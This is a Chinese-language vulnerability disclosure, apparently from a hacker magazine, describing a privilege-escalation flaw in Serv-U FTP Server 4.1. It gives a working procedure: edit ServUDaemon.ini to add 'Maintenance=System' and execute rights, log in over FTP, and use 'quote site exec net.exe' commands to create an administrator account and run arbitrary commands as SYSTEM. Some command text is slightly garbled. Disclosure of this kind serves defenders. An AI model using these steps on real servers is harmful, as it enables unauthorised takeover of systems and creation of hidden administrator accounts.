Serv-U FTP Server遠程/本地提升許可權缺陷

server|serv-u Serv-U FTP Server為RhinoSoft出品的一款Ftp Sserver軟體，目前在全世界廣為使用。經我研究發現，Serv-U FTP Server的設定檔存貯於Serv-U FTP Server檔案目錄下的ServUDaemon.ini檔案中。如果本地受限使用者或者遠程擁有普通許可權的攻擊者能接觸到該檔案並精心構造ServUDaemon.ini檔案中的內容就能利用Ftp進程在系統上以SYSTEM許可權執行任意命令。

四、缺陷分析：
Serv-U FTP Serve在設定使用者以後會把配置資訊儲存與ServUDaemon.ini檔案中。包括使用者的許可權資訊和可訪問目錄資訊。本地受限使用者或者是遠程攻擊者只要能夠讀寫Serv-U FTP Serve的檔案目錄，就可以通過修改目錄中的ServUDaemon.ini檔案實現以Ftp進程在遠程、本地系統上以FTP系統管理員許可權來執行任意命令。並且不受系統版本的影響。（使用者資訊選擇“儲存與系統註冊表中”不受此缺陷影響）

五、測試方法：

1、本地測試
   假設本地受限使用者可以瀏覽Serv-U FTP Serve的檔案目錄。找到ServUDaemon.ini檔案。用記事本開啟原檔案大致內容為：
[GLOBAL]
Version=4.1.0.0    // Serv-U Ftp Server 版本號碼
ProcessID=584
RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0    //主機IP以及網域名稱,連接埠情況
[Domain1]
User1=zihuan|1|0
[USER=zihuan|1]
Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir=c:\     // 可以瀏覽的目錄
TimeOut=600  
Access1=C:\|RWAMLCDP

如果把ServUDaemon.in檔案修改為：

[GLOBAL]
Version=4.1.0.0
ProcessID=584
RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0          
[Domain1]
User1=zihuan|1|0
[USER=zihuan|1]
Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir=c:\
TimeOut=600
Maintenance=System  //權限類別型
Access1=C:\|RWAMELCDP

以上內容比原內容多了一句“Maintenance=System”修改完成後儲存。然後在用Ftp登陸到Serv-U FTP Server以後執行如下命令：

ftp>open ip    
Connected to ip.
220 Serv-U FTP Server v4.1.0.0 for WinSock ready...
User (ip:(none)): id  //輸入構造的使用者
331 User name okay, please send complete E-mail address as password.
Password:password  //密碼
230 User logged in, proceed.
ftp> cd winnt   //進入win2k的winnt目錄，如果是winxp或者是windows server 2003就應該為windows目錄。
250 Directory changed to /WINNT
ftp>cd system32  //進入system32目錄
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user zihuan ziHUAN /add   //利用系統的net.exe檔案加使用者。
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators zihuan /add  //提升為超級使用者

這樣就在本地系統上加了一個為zihuan密碼為:ziHUAN的超級使用者。也可以直接用quote site exec net.exe localhost administrators user /add命令把目前使用者提升到超級使用者組中去。當然也可以在系統上執行任何命令。


聲明：

本本僅用來描述可能存在的安全問題，作者本人和駭客X檔案雜誌社不為此資訊安全諮詢提供任何保證或承諾。由於傳播、利用此文章提供的資訊而造成的任何直接或者間接的後果及損失，均由使用者本人負責，本文作者不為此承擔任何責任。作者擁有對此資訊安全諮詢的修改和解釋權。如欲轉載或傳播此文章，必須保證此文章的完整性，包括著作權聲明等全部內容。未經作者本人允許，不得任意修改或者增減此文章公告內容。